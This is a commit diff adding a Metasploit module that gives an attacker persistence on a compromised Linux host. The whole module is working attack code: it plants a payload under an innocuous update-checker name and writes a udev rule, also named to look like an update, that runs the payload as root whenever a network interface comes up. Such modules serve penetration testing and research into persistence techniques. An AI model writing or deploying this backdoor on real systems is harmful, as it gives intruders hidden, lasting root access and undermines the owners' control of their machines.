Add modules/exploits/linux/local/udev_persistence.rb

Co-authored-by: jheysel-r7 <[email protected]>

Author: jvoisin

modules/exploits/linux/local/udev_persistence.rb

@@ -0,0 +1,65 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'udev persistence',
+        'Description' => %q{
+          This module will add a script in /lib/udev/rules.d/ in order to execute a payload written on disk.
+          It'll be executed with root privileges everytime a network interface other than l0 comes up.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Julien Voisin' ],
+        'Platform' => [ 'unix', 'linux' ],
+        'Arch' => ARCH_CMD,
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => true },
+        'Targets' => [ ['Automatic', {}] ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '1999-01-01',
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        },
+        'References' => [
+          ['URL', 'https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp'],
+          ['URL', 'https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/'],
+        ]
+      )
+    )
+    register_options([ OptString.new('PAYLOAD_PATH', [true, 'The payload\'s path on disk', '/usr/bin/udev-check-updates']) ])
+    register_options([ OptString.new('BACKDOOR_PATH', [true, 'The backdoor\'s path on disk', '/lib/udev/rules.d/99-update.rules']) ])
+  end
+
+  def exploit
+    unless writable? File.dirname(datastore['BACKDOOR_PATH'])
+      fail_with Failure::BadConfig, "#{datastore['BACKDOOR_PATH']} is not writable"
+    end
+    if exists? datastore['BACKDOOR_PATH']
+      fail_with Failure::BadConfig, "#{datastore['BACKDOOR_PATH']} is already present"
+    end
+
+    unless writable? File.dirname(datastore['PAYLOAD_PATH'])
+      fail_with Failure::BadConfig, "#{datastore['PAYLOAD_PATH']} is not writable"
+    end
+    if exists? datastore['PAYLOAD_PATH']
+      fail_with Failure::BadConfig, "#{datastore['PAYLOAD_PATH']} is already present"
+    end
+
+    upload_and_chmodx(datastore['PAYLOAD_PATH'], "#!/bin/sh\n#{payload.encoded}")
+    print_status "#{datastore['PAYLOAD_PATH']} written"
+
+    write_file(datastore['BACKDOOR_PATH'], 'SUBSYSTEM=="net", KERNEL!="lo", RUN+="/usr/bin/at -M -f ' + datastore['PAYLOAD_PATH'] + ' now"')
+    print_status "#{datastore['BACKDOOR_PATH']} written"
+  end
+end